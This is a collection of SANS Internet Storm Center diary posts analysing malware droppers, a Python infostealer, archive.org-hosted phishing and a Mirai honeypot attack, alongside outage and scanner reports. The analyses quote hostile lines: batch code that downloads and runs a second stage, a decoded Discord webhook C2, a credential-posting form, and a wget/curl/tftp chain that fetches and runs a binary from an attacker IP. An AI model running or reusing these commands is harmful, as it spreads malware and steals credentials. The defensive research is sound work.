Published: 2024-02-23

Simple Anti-Sandbox Technique: Where's The Mouse?

Malware samples have plenty of techniques to detect if they are running in a "safe" environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking for the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are certain devices present or not?).

Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]

set "mouseConnected=false"

for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"
)

if not !mouseConnected! == true (
    exit /b 1
)

The script uses the WMI ("Windows Management Instrumentation") client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:

C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value




Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.
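For defenders who want to replicate the check, the same logic can be sketched in a few lines of Python. This is a hedged illustration: the parsing assumes the `Key=Value` lines that `wmic /value` produces, and the sample device ID below is made up.

```python
# Sketch: decide whether a pointing device is present by parsing
# "wmic path Win32_PointingDevice get PNPDeviceID /value" style output,
# where each populated line is a "Key=Value" pair.
def mouse_connected(wmic_output: str) -> bool:
    return any(
        line.startswith("PNPDeviceID=") and line.split("=", 1)[1].strip()
        for line in wmic_output.splitlines()
    )

sample = "PNPDeviceID=HID\\VID_046D\r\n\r\n"   # made-up device ID for the demo
print(mouse_connected(sample))   # True
print(mouse_connected(""))       # False
```

On a real Windows system, you would feed this function the captured output of the wmic command (e.g., via `subprocess.run`).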

If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:

set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
del !eeee!

Finally, it will download and execute the second stage:

set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw"
set "OUTPUT_FILE=webpage.py"
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
if %ERRORLEVEL% neq 0 (
    echo Error: Failed to download the webpage.
    exit /b 1
)
python -m %OUTPUT_FILE%

The second stage is another InfoStealer. Nothing special, except the way the Discord channel used as C2 is obfuscated:

webhook = b'\xc8~~\xc9(T>>\x10\x1e(\x82=\xa1\x10\x95\x82=$>\xbc\xc9\x1e>lM1\xc8=={(>\xb08-Z-\xb3-\x8b8\x8b\x1b\xb0\xb3\xb0\xb08\x87Z\x8b>\xf91\xe0f&\x82g\xe0\xa7g\x98\xf0Y\xd60\xcdX\xb4\xb4\xfe\xa6\xc9\xc9l~Y(g\xf8\x1c&\x82\xd6Nf\x87e\xe0\xf7)\xf70e_,8\xfe\xa6Z\x1c\xe28M\xaf_\xc6,1E\xf7N_\xf2,_\x1b\ne',b'x.\x8d\\V+\xb1c\x94\x9cw\xb5\x8c\t]\x12\r\x91[5y\x8a\x15L\xe5Bq\xd0\xa5\x0c\xd9\xe8\x9f\xdd\x93J\xd4\x88\xb8\x84\xa3K\x02\x0f\xa8E\x95>-\xb08\x87\x8b\x1b\xb3\xf2\x18ZTG\x16\xb2i\xcf\x11\xb4\xf7\x07\x1cuOY\xcd\xe0_,m&\xf0\xaaX\xfeW\xaf\x90\xf9\xc6\xae\xf8\x08\n\x7f\xab\x014e\x9a\xbc1\x82\x10M)f\xc8\x1e\xd6{g$\xe2=\xc9\x98\xa1(~N\xc5l\xa6\xa70\xba/\x053\xb6b\xfd"\xde\xa4h\x9bId\xc1\xc4\xb9\x96\xf3\x83\x06\xbd2H\xc7\xc0\xd5z\xa0\x99ao\xef\x13r\x1dP7\x14v\xa2\xeek\xeb\xe1\xbf9}:R\xe7\'\xbb<DQ\x9e^\xfc\xad%\x8e\x1f\x97\xc2U\x19\x86\x17\x81\xff\xea\xfa\x9dF\xa9p!\xcc#\xc3C\x85\xdc|\xf5j;\xbeA\xec\xe4\x80\xd2\xf4S\xb7\xdb\xe9\x89\xcb\xd76\x0b\xe3`@\x92\x03\xf1s\xfbn\xf6\xd1\xda\xd3\x0e\xd8t\x00\x8f\xed\xe6\xac \xdf\x04\xca?*\x1a\xce'

It is decrypted using this simple function:

def DeobfuscateWeb(encrypted_text, key):
    # Build the inverse substitution table from the 256-byte key
    decrypted = [0] * 256
    for i, char in enumerate(key):
        decrypted[char] = i

    decrypted_text = []
    for char in encrypted_text:
        decrypted_text.append(decrypted[char])

    return bytes(decrypted_text)

and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"
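To illustrate the scheme, here is a self-contained toy version: the "key" is a 256-byte permutation used as a substitution table, and decryption is just the inverse lookup. The key and the "secret" below are generated for this demo and are not the actual values from the sample.

```python
import random

rng = random.Random(1234)                        # fixed seed for repeatability
key = bytes(rng.sample(range(256), 256))         # substitution table (a permutation)

def obfuscate(data: bytes, key: bytes) -> bytes:
    # Replace each byte by its entry in the substitution table
    return bytes(key[b] for b in data)

def deobfuscate(data: bytes, key: bytes) -> bytes:
    # Build the inverse table, then map each byte back
    inverse = [0] * 256
    for i, b in enumerate(key):
        inverse[b] = i
    return bytes(inverse[b] for b in data)

secret = b"hxxps://example[.]invalid/webhook"    # placeholder, not the real C2
assert deobfuscate(obfuscate(secret, key), key) == secret
```

Note that the malware only needs to ship the table itself: inverting it at runtime is enough to recover the webhook URL.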

[1] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-22

Large AT&T Wireless Network Outage #att #outage

[UPDATE] As of 11:30am ET, AT&T states that about 75% of its network is operational, and they are recovering the rest. Several news sources noted that Verizon and T-Mobile may also have outages. This is likely a misinterpretation of Downdetector, a website that monitors user complaints about outages: affected AT&T customers often mention other carriers, which then show up on Downdetector as well. For example, Apple Support is also showing problems according to Downdetector, likely because AT&T customers called Apple suspecting their phones were broken after being unable to connect to the cellular network. Some 911 systems are reporting increased call volume due to the outage.


Beginning this morning, AT&T's cellular network suffered a major outage across the US. At this point, AT&T has not made any statement as to the nature of the outage. It is far too early to speculate. In the past, similar outages were often caused by misconfigurations or technology failures.

What makes the outage specifically significant is that phones cannot connect to cell towers in some areas. This means you cannot make any calls, send or receive SMS messages, or reach emergency services. Some iPhones display the "SOS" indicator, which is displayed if the phone is able to make emergency-only calls via another provider's network. For some newer iPhones, satellite services may be used.

As a workaround, WiFi calling is still reported to work. If you do have an internet connection via a different provider and are able to enable WiFi calling, you will be able to make and receive calls.

Note that this will affect many devices like location trackers, alarm systems, or other IoT devices that happen to use AT&T's network. This could have security implications if you rely on these devices to monitor remote sites.

Some users are reporting that service has already been restored in their area, but without an official statement from AT&T, it is hard to predict how long service restoration will take. For your own planning purposes, I would assume it will be several hours for the service to be fully restored.

Some other workarounds to consider:

  • Many modern phones will allow for a second eSIM to be installed. T-Mobile, for example, sometimes offers free trials of its network, and a trial may get you going for the day.
  • As mentioned above, WiFi calling is reported to work.
  • Get a data-only eSIM with a low-cost provider with enough data to "survive" the day.

For resiliency, it is always best to have a secondary internet connection available. In many cases, the cellular connection is your secondary connection. The outage also affects AT&T resellers (MVNOs) like Cricket, Consumer Cellular, and Straight Talk.

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-22

[Guest Diary] Friend, foe or something in between? The grey area of 'security research'

[This is a Guest Diary by Rachel Downs, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

Scanning on port 502

I’ve been running my DShield honeypot for around 3 months, and recently opened TCP port 502. I was looking for activity on this port as it could reveal attacks targeted towards industrial control systems which use port 502 for Modbus TCP, a client/server communications protocol. As with many of my other observations, what started out as an idea to research one thing soon turned into something else, and ended up as a deep dive into security research groups and the discovery of a lack of transparency about their actions and intent.

I analysed 31 days of firewall logs between 2023-12-05 and 2024-01-04. Over this period, there were 197 instances of scanning activity on port 502 from 179 unique IP addresses.
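This kind of tally is easy to reproduce. The sketch below assumes iptables-style log lines with `SRC=` and `DPT=` fields; the sample lines use documentation IP ranges rather than real honeypot data.

```python
from collections import Counter
import re

# Sketch: count port-502 scan events per source IP from firewall log lines.
sample_log = """\
kernel: INBOUND SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP DPT=502
kernel: INBOUND SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP DPT=502
kernel: INBOUND SRC=192.0.2.99 DST=203.0.113.5 PROTO=TCP DPT=502
"""

hits = Counter()
for line in sample_log.splitlines():
    if "DPT=502" not in line:          # only Modbus TCP probes
        continue
    m = re.search(r"SRC=(\S+)", line)  # source address field
    if m:
        hits[m.group(1)] += 1

print(f"{len(hits)} unique IPs, {sum(hits.values())} scan events")
# 2 unique IPs, 3 scan events
```

From here, each unique source address can be enriched with AbuseIPDB or GreyNoise data as described above.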


Almost 90% of scanning came from security research groups

Through AbuseIPDB [2] and GreyNoise [3], I assigned location, ISP and hostname data (where available) to each IP address. GreyNoise assigns actors to IP addresses and categorises these as benign, unknown or malicious. Actors are classified as benign when they are a legitimate company, search engine, security research organisation, university or individual, and GreyNoise has determined the actor is not malicious in nature. Actors are classified as malicious if harmful behaviours have been directly observed by GreyNoise, and if an actor is not classified as benign or malicious it is marked as unknown [4]. 

I used this classification, additional data from AbuseIPDB, and the websites of self-declared security research groups to categorise the scanning activity observed in my honeypot firewall logs.


89% of the total scanning activity was attributed to security research groups, 3% was attributed to known malicious actors and 8% was unknown.

Who are these researchers, and why are they scanning?

Almost half of the activity classified as security research came from two groups: Stretchoid and Censys. Other frequently observed groups included Palo Alto Networks, Shadowserver Foundation, InterneTTL, Cyble and the Academy for Internet Research. The remaining groups were only observed scanning port 502 once or twice each, including Shodan.


The motivations of these different research groups vary, and for some their purpose is unclear or unstated. Some are academic research projects, some are commercial organisations collecting data to feed into their products and services, and others are less clear.

Stretchoid was the most active actor identified, accounting for 25% of security research activity. There is very little information available about them, aside from an opt-out page. The page states “Stretchoid is a platform that helps identify an organisation’s online services. Sometimes this activity is incorrectly identified by security systems, such as firewalls, as malicious. Our activity is completely harmless” [5]. However, there is a lack of transparency around the organisation responsible for Stretchoid and as such, online discussions about them urge caution around submitting data through the opt-out form [6].

Censys conducts internet-wide scanning to collect data for its security products and datasets [7].

Palo Alto Networks could be identified by ISP name; however, they do not enable reverse DNS lookups for hostnames that would identify the scanner being used. These IP addresses are marked as benign in GreyNoise and attributed to Palo Alto’s Cortex Xpanse product.

Shadowserver Foundation describe themselves as “a nonprofit security organisation working altruistically behind the scenes to make the internet more secure for everyone” [8].

InterneTTL’s website was not active at the time of this report, however GreyNoise points to it being a security research organisation that regularly mass-scans the internet [9].

Cyble describes its ODIN product as “one of the most powerful search engines for internet scanned assets”. It carries out host searches, asset discovery, port scanning, service identification, vulnerability detection and certificate analysis [10].

The Academy for Internet Research’s website states they are “a group of security researchers that wish to make the internet free, safe and accessible to all” [11].

bufferover.run is identified by GreyNoise as a commercial organisation that performs domain name lookups for TLS certificates in IPv4 space. GreyNoise has marked this actor as benign but it is unclear why they are carrying out port scanning activity [12].

Crowdstrike was seen twice via scans from Crowdstrike Falcon Surface (Reposify), which they describe as “the world’s leading AI-native platform for unified attack surface management” [13].

SecurityTrails is a Recorded Future company offering APIs and data services for security teams [14].

Shodan scanners were seen twice. These are used to capture data for Shodan’s search engine for internet-connected devices [15].

Alpha Strike Labs is a German security research company producing open source intelligence about attack surfaces using global internet scans. They claim to maintain more than 2000 IPv4 addresses for scanning [16].

BinaryEdge “scan the entire public internet, create real-time threat intelligence streams and reports that show the exposure of what is connected to the internet” [17].

CriminalIP is an internet-exposed device search engine run by AI Spera [18].

Internet Census Group is led by BitSight Technologies Inc and states data is collected to “analyse trends and benchmark security performance across a broad range of industries” [19].

Internet Measurement is operated by driftnet.io and is used to “discover and measure services that network owners and operators have publicly exposed”. They offer free access to an external view of your network from the data they have gathered [20].

Onyphe describes itself as a “cyber defence search engine” [21]. They provide an FAQ about their scanning on their website.

The Technical University of Denmark’s research project aims to identify “digital ghost ships” [22], devices which appear to be abandoned and un-maintained.

A lack of transparency

The UK's National Cyber Security Centre (NCSC), when launching its own internet scanning capability, provided some transparency and scanning principles [23] that they committed to following, and encouraged other security researchers to do the same:

  • Publicly explain the purpose and scope of the scanning system
  • Mark activity so that it can be traced back to the scanning system being used
  • Audit scanning activity so abuse reports can be easily and confidently assessed
  • Minimise scanning activity to reduce impact on target resources
  • Ensure opt-out requests are simple to send and processed quickly

Adherence to these principles varied between the research groups observed, but was generally quite poor among the more prolific scanners in this observation. It was not possible to observe whether research groups were auditing scanning activity, so this is not rated in the table below.

Fig 4: An analysis of security research groups’ adherence to NCSC’s ethical scanning principles

Fig 5: A guide to the ratings used in Fig 4


This lack of transparency makes it difficult to determine whether this activity is truly benign.

Good practice is demonstrated by Onyphe, who provide information about their scanning and their “10 commandments for ethical internet scanning” on their website. Along with the Technical University of Denmark, they also provide a web server on each of their probes which explains the purpose, intent and the ability to opt out.  

Why does this matter?

The volume of scanning activity related to security research is significant, and has an impact on honeypot data. This has been discussed in a previous ISC blog post by Johannes Ullrich, “The Impact of Researchers on Our Data” [24]. Quick and accurate identification and filtering of research activity enables honeypot operators to more rapidly identify malicious activity, or activity that requires further investigation.

Equally, the presence of honeypot data in security research scans impacts the conclusions that will be drawn by researchers about the presence of open ports and vulnerable systems, and the estimated scale of these issues.

Although researchers themselves may not be using the data collected for malicious purposes, they may lose control of how the data is used once it is shared or sold elsewhere. For example, Shodan scanning activity is classed as security research, however the resulting data can be used by attackers to find vulnerable targets. 

Some of the organisations involved in this scanning are profiting from the data collected from your systems, utilising your resources to do this. Ethical researchers should allow you to opt-out of this data collection.

Security research is a broad term, and the intent behind scanning activity is not always clear. This makes security research something of a grey area, and means transparency is key in order for informed decisions to be made.

What should I do?

As a honeypot operator, or someone responsible for monitoring internet-facing systems, you may decide to reduce scanning noise by blocking security research traffic. This is made difficult when researchers don’t publish the IP addresses they use, or don’t provide the ability to opt-out. To help with this, the ISC provides a feed of IP addresses used by researchers through their API [25].

All activity relating to Stretchoid, the most active research group in this observation, originated from DigitalOcean. Some users recommend blocking DigitalOcean’s IP ranges (unless this is required for your organisation) as an alternative to opting out. 

A number of GitHub projects also exist to track the IP ranges of Stretchoid and other security research groups, such as szepeviktor’s stretchoid.ipset [26].
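As a sketch of how such a list can be consumed, the snippet below loads a simple one-entry-per-line IP/CIDR list and checks addresses against it. This is a hedged illustration: the actual ipset file may use a different syntax, and the ranges shown are documentation prefixes, not real Stretchoid addresses.

```python
import ipaddress

# Illustrative block list: one CIDR or bare IP per line, "#" for comments.
sample_ipset = """\
# comment lines are skipped
198.51.100.0/24
203.0.113.8
"""

networks = [
    ipaddress.ip_network(line.strip(), strict=False)
    for line in sample_ipset.splitlines()
    if line.strip() and not line.startswith("#")
]

def is_blocked(ip: str) -> bool:
    # True if the address falls inside any listed range
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)

print(is_blocked("198.51.100.42"))   # True
print(is_blocked("192.0.2.1"))       # False
```

The same membership test could feed a firewall rule generator or a log-filtering step in a honeypot pipeline.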

Research groups could do more to build trust and help security teams separate benign activity from malicious. If you carry out internet scanning activities, it’s a good idea to follow the NCSC guidance discussed in this blog post to maintain transparency and allow others to make informed decisions about allowing or blocking your scans. 

Enabling reverse DNS and using hostnames that identify your organisation or scanner is a good way to make your scanning activity identifiable, and an informative web page with a clear explanation of the purpose of data collection, including the ability to opt out, helps demonstrate your positive intentions. 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://www.abuseipdb.com
[3] https://www.greynoise.io
[4] https://docs.greynoise.io/docs/understanding-greynoise-classifications
[5] https://stretchoid.com/
[6] https://www.reddit.com/r/cybersecurity/comments/10w2eab/stretchoid_phishing_and_recon_campaign/
[7] https://about.censys.io/
[8] https://www.shadowserver.org/
[9] https://viz.greynoise.io/tag/internettl?days=1
[10] https://getodin.com/
[11] https://academyforinternetresearch.org/
[12] https://viz.greynoise.io/tag/bufferover-run?days=1
[13] https://www.crowdstrike.com/products/exposure-management/falcon-surface/
[14] https://securitytrails.com/
[15] https://www.shodan.io/
[16] https://www.alphastrike.io/en/how-it-works/
[17] https://www.binaryedge.io/
[18] https://www.criminalip.io/
[19] https://www.internet-census.org/home.html
[20] https://internet-measurement.com/
[21] https://www.onyphe.io/about
[22] https://www.dtu.dk/english/newsarchive/2023/01/setting-out-to-sink-the-internets-digital-ghost-ships
[23] https://www.ncsc.gov.uk/blog-post/scanning-the-internet-for-fun-and-profit
[24] https://isc.sans.edu/diary/The+Impact+of+Researchers+on+Our+Data/26182
[25] https://isc.sans.edu/api/threatcategory/research (append “?json” or “?tab” to view in JSON or tab delimited format)
[26] https://github.com/szepeviktor/debian-server-tools/blob/master/security/myattackers-ipsets/ipset/stretchoid.ipset

Jesse La Grew


Published: 2024-02-21

Phishing pages hosted on archive.org

The Internet Archive is a well-known and much-admired institution, devoted to creating a “digital library of Internet sites and other cultural artifacts in digital form”[1]. On its “WayBackMachine” website, which is hosted on https://archive.org/, one can view archived historical web pages from as far back as 1996. The Internet Archive basically functions as a memory for the web, and currently holds over 800 billion web pages as well as millions of books, audio and video recordings and other content… Unfortunately, since it allows for uploading of files by users, it is also used by threat actors to host malicious content from time to time[2,3].

Over the last few weeks, I came across two different phishing messages, which linked to archive.org.

URLs from both messages had similar structure, since they both pointed to directories created for individual Internet Archive users, and both passed the e-mail address of the recipient to the phishing page in the same manner – as an anchor hash attribute:


While the link from the first message was already dead when I got to it, the second one led to a still active phishing page (this single SHTML page was the only content uploaded by the corresponding user account), which displayed a fake login window above an image of the legitimate website associated with the domain extracted from the e-mail of the recipient.

In the following image, you may see how it looked when the “abc@isc.sans.edu” e-mail address was provided.

It is worth mentioning that the page used the same approach to load the logo and image of the legitimate website as a phishing page discovered by Johannes back in 2022[4], i.e., the logo was loaded using a call to clearbit.com, and the image of the website itself using a call to thum.io, as the following excerpt shows.


var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var final= c.toLowerCase();
var finalu= c.toUpperCase();
var sv = my_slice;

var image = "url('https://image.thum.io/get/width/1200/https://"+sv+"')";

$("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);

$("#logoimg").attr("alt", finalu);

document.getElementById("bgimg").style.backgroundImage= image;
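The same branding trick can be mirrored in a short Python sketch: derive the target organisation's domain from the victim's e-mail address, then build the clearbit.com logo URL and thum.io screenshot URL the page uses. The function name is mine, not from the phishing kit.

```python
# Sketch of the phishing page's self-customization logic.
def branding_urls(email: str) -> tuple[str, str]:
    domain = email.split("@", 1)[1]    # e.g. "isc.sans.edu"
    logo = f"https://logo.clearbit.com/{domain}"
    screenshot = f"https://image.thum.io/get/width/1200/https://{domain}"
    return logo, screenshot

logo, shot = branding_urls("abc@isc.sans.edu")
print(logo)   # https://logo.clearbit.com/isc.sans.edu
```

Because the page builds these URLs purely client-side from the address in the anchor hash, a single uploaded file can impersonate any organisation.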


This similarity with a historical phishing page turned out not to be too surprising, since even a quick look at the HTML code of the current page showed quite clearly that it was mostly cobbled together from different pre-existing pieces of code.

This was done in quite a clumsy manner, for example:

  • some portions of code were included twice without reason,
  • there was an attempt to display a missing image (see the picture above – it was supposed to show a “norton.png” file – probably something along the lines of “this site is safe – it was scanned by an antivirus engine”),
  • the HTML code contained a CloudFlare tracking script (this was certainly included by mistake, since it was quite useless from the standpoint of the phishing author and in any case couldn’t function correctly), and
  • there was a large section of commented-out JavaScript code, including a part which contained the same elementary “anti-analysis” functionality I wrote about back in November[5].

  // prevent ctrl + s
// $(document).bind('keydown', function(e) {
// if(e.ctrlKey && (e.which == 83)) {
// e.preventDefault();
// return false;
// }
// });

// document.addEventListener('contextmenu', event => event.preventDefault());

// document.onkeydown = function(e) {
// if (e.ctrlKey && 
// (e.keyCode === 67 || 
// e.keyCode === 86 || 
// e.keyCode === 85 || 
// e.keyCode === 117)) {
// return false;
// } else {
// return true;
// }
// };
// $(document).keypress("u",function(e) {
// if(e.ctrlKey)
// {
// return false;      }
// else {
// return true;
// }});


In any case, if a victim were to input their credentials and press the (somewhat sub-optimally named) “Submit Query” button, the data would have been sent to a form hosted at submit-form.com, an online service that allows easy gathering of information through forms without the need to set up any infrastructure.


dataType: 'JSON',
url: 'hxxps[:]//submit-form[.]com/8dcxPGp2',
type: 'POST',
            website: sv,


Although the two phishing messages and the page mentioned above are hardly examples of the most dangerous or sophisticated threats, they do show quite well that abuse of legitimate services by threat actors is rampant and that vigilance among users of modern internet must be never-ending.

It is also worth noting that even though the URLs in the phishing messages pointed to archive.org, they didn’t point to the second-level domain itself, but to fourth-level subdomains related to user-assigned data. A quick test seems to indicate that the WayBackMachine itself only uses the domains archive.org, web-static.archive.org and web.archive.org to provide its historical view of the internet. If one wanted to, one could therefore easily detect, hunt for, or block attempted access to any potentially malicious content uploaded to the Internet Archive by arbitrary users (i.e., in the same way as the phishing page discussed above was) simply by looking for fourth-level subdomains on archive.org (or for any archive.org subdomain besides the three mentioned above).
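The allow-list idea above can be sketched in a few lines of Python. The hostnames in the example are illustrative; the allow-list is taken from the three domains mentioned in the text.

```python
# Sketch: flag archive.org hostnames that are not among the domains
# the WayBackMachine itself is known to use.
ALLOWED = {"archive.org", "web.archive.org", "web-static.archive.org"}

def suspicious_archive_host(hostname: str) -> bool:
    hostname = hostname.lower().rstrip(".")
    if hostname != "archive.org" and not hostname.endswith(".archive.org"):
        return False                   # not an archive.org host at all
    return hostname not in ALLOWED     # deeper subdomain -> user content

print(suspicious_archive_host("foo.bar.archive.org"))   # True
print(suspicious_archive_host("web.archive.org"))       # False
```

A check like this could run over proxy or DNS logs to surface accesses to user-uploaded Internet Archive content.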

It should also be mentioned that although I flagged the file hosted on the Internet Archive as phishing through an archive.org reporting mechanism, and also reported the malicious use of the specific Submit Form form several days ago, both are unfortunately still up at the time of writing…

[1] https://archive.org/about/
[2] https://blog.rootshell.be/2017/04/20/archive-org-abused-deliver-phishing-pages/
[3] https://isc.sans.edu/diary/Malicious+Content+Delivered+Through+archiveorg/27688
[4] https://isc.sans.edu/diary/web3+phishing+via+selfcustomizing+landing+pages/28312
[5] https://isc.sans.edu/diary/Phishing+page+with+trivial+antianalysis+features/30412

Jan Kopriva
Nettles Consulting


Published: 2024-02-20

Python InfoStealer With Dynamic Sandbox Detection

Infostealers written in Python are not new. They also incorporate many sandbox-detection mechanisms to avoid being executed (and probably detected) by automated analysis. Last week, I found one that uses the same approach but in a different way. Usually, such scripts have a hardcoded list of "bad stuff" to check: MAC addresses, usernames, processes, etc. These are common ways to detect simple sandboxes that are not well-hardened. This time, the "IOD" (Indicators Of Detection) list is stored online on a Pastebin-like site, allowing the indicators to be updated for all scripts already deployed. It also means the script itself discloses less interesting information.

The file, called main.py, has a VT score of 22/61 (SHA256: e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06)[1]

The script will fetch indicators from many files hosted on rentry.co[2]:

remnux@remnux:/MalwareZoo/20240217$ grep hxxps://rentry[.]co main.py 
     processl = requests.get("hxxps://rentry[.]co/x6g3is75/raw").text
     mac_list = requests.get("hxxps://rentry[.]co/ty8exwnb/raw").text
     vm_name = requests.get("hxxps://rentry[.]co/3wr3rpme/raw").text
     vmusername = requests.get("hxxps://rentry[.]co/bnbaac2d/raw").text
     hwid_vm = requests.get("hxxps://rentry[.]co/fnimmyya/raw").text
     gpulist = requests.get("hxxps://rentry[.]co/povewdm6/raw").text
     ip_list = requests.get("hxxps://rentry[.]co/hikbicky/raw").text
     guid_pc = requests.get("hxxps://rentry[.]co/882rg6dc/raw").text
     bios_guid = requests.get("hxxps://rentry[.]co/hxtfvkvq/raw").text
     baseboard_guid = requests.get("hxxps://rentry[.]co/rkf2g4oo/raw").text
     serial_disk = requests.get("hxxps://rentry[.]co/rct2f8fc/raw").text

All files were published on January 27 2024 around 23:19 UTC. The website also shows the number of views. Currently, there are only two (certainly my own visits), so the script hasn't been released in the wild yet. I'll keep an eye on these counters in the coming days.

Here is an example of usage:

def checkgpu(self):
    c = wmi.WMI()
    for gpu in c.Win32_DisplayConfiguration():
        GPUm = gpu.Description.strip()
    gpulist = requests.get("https://rentry.co/povewdm6/raw").text
    if GPUm in gpulist:
        ...  # excerpt ends here; the sample presumably bails out when a known sandbox GPU is matched

The remaining part of the stealer is very classic. I just extracted the list of targeted websites (cookies are collected and exfiltrated):

keyword = [

You can see that classic sites are targeted, but generic keywords are also present, like "crypto", "bank" or "card". Cookies belonging to URLs containing these keywords will also be exfiltrated.
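The filtering logic can be sketched as follows. The keyword list here is a short illustrative subset, not the actual list extracted from the sample, and the hostnames are made up.

```python
# Sketch: a cookie is exfiltrated if its host matches a targeted site
# or contains one of the generic keywords.
keywords = ["discord", "paypal", "crypto", "bank", "card"]

def is_targeted(cookie_host: str) -> bool:
    host = cookie_host.lower()
    return any(k in host for k in keywords)

print(is_targeted("www.mybank.example"))    # True  ("bank" substring)
print(is_targeted("news.example.org"))      # False
```

Substring matching like this is crude but cheap, which is why generic keywords such as "bank" cast a very wide net.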

[1] https://www.virustotal.com/gui/file/e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06/details
[2] https://rentry.co

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-18

YARA 4.5.0 Release

YARA 4.4.0 was released, including the announced LNK module.

But the same day, YARA 4.5.0 was released without LNK support. It looks like the LNK module will only be released with the new YARA rewrite in Rust.


Didier Stevens
Senior handler
Microsoft MVP


Published: 2024-02-18

Wireshark 4.2.3 Released

Wireshark release 4.2.3 brings 20 bug fixes.

And if you are upgrading from Wireshark 4.2.0 or 4.2.1 on Windows, you will need to download and install this or a later version manually.

Didier Stevens
Senior handler
Microsoft MVP


Published: 2024-02-18

Mirai-Mirai On The Wall... [Guest Diary]

[This is a Guest Diary by Rafael Larios, an ISC intern as part of the SANS.edu BACS program]

About This Blog Post

This article is about one of the ways attackers on the open Internet are attempting to use the Mirai botnet [1][2] malware to exploit vulnerabilities in exposed IoT devices. My name is Rafael Larios, and I am a student in the SANS Technology Institute’s Bachelor’s in Applied Cyber Security program. One of the requirements for completion of this degree is to participate in an internship with the Internet Storm Center as an apprentice handler. Throughout this article, I will provide some insight into an attack method I found interesting.

It’s All About Mirai...

There are many sources discussing Mirai and the vulnerabilities found in IoT devices that allow attackers to join a host to their botnet. This malware is still relevant and continues to be used in attempts to compromise undefended systems. In 2023, at least three CVEs involving Mirai were reported: CVE-2023-1389 [3], CVE-2023-26801 [4], and CVE-2023-23295 [5]. The malware has continued to evolve since its initial creation in 2016. More on the humble origins of this malware can be found in the citations at the end of this article.

What Happened?

This article does not involve malware reverse engineering, but an analysis of how an attacker executed their plans on our honeypot. Using Cowrie, I observed an attack on 20 August 2023 that stood out from the other attacks in the TTY logs. Wikipedia describes Cowrie as “...a medium interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction performed by an attacker. Cowrie also functions as an SSH and telnet proxy to observe attacker behaviour to another system”. More information can be found on GitHub.


The recorded attack was significantly larger than average at 177 KB, compared to typical logged attacks of half that size or less. After analysis, it turned out that the attack involved a trojan downloader for a botnet.

Playing back the TTY log entry with the Python playlog utility from within Cowrie, I found that the attacker used 51 SSH commands before the connection was terminated. This explains the size of the log.

The attack seemed automated and involved various system checks before downloading 312 bytes to the /tmp folder with the following command:

wget http://46.29.166[.]61/sh || curl -O http://46.29.166[.]61/sh || tftp 46.29.166[.]61 -c get sh || tftp -g -r sh 46.29.166[.]61; chmod 777 sh;./sh ssh; rm -rf sh

The chain of commands attempts to use built-in Linux tools to download a file called ‘sh’ from an IP address in Moscow, Russian Federation. It tries wget, curl, or tftp in turn to download ‘sh’, then makes it executable, runs it with the argument ‘ssh’, and finally removes the downloaded binary.

An error occurred, and bash reported that the command was not found. The attacker then tried to delete any existing copies of the files it was about to add to the /tmp folder. The following command was used to accomplish this:

rm -rf x86; rm -rf sshdmiori

Afterwards the attacker obtained information about the honeypot’s CPU with the following command:

cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo

We now come to the next stage of the attack.

Hexadecimal to Binary Executable
Within the 51 executed commands, 41 were echo commands appending hexadecimal byte values to a file named ‘x86’. Below is one of the 41 commands:

echo -ne "\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x51\xe5\x74\x64\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> x86

After concatenating all of the hexadecimal bytes into a binary file, I was able to compute the SHA256 hash using CyberChef, a tool created and maintained by GCHQ, which can be found on GitHub: https://github.com/gchq/CyberChef
SHA256: b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
Each of the echo commands was copied and pasted into CyberChef, and a ‘recipe’ was used to decode the string from hexadecimal to binary, which was then saved as an executable.
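The same reassembly can be reproduced without CyberChef. Below is a minimal Python sketch; the two echo commands shown are truncated stand-ins for the 41 real chunks from the TTY log, not the actual payload.

```python
import hashlib
import re

# Hypothetical stand-ins for the 41 echo commands captured in the TTY log;
# each real command appended a chunk of the ELF file to "x86".
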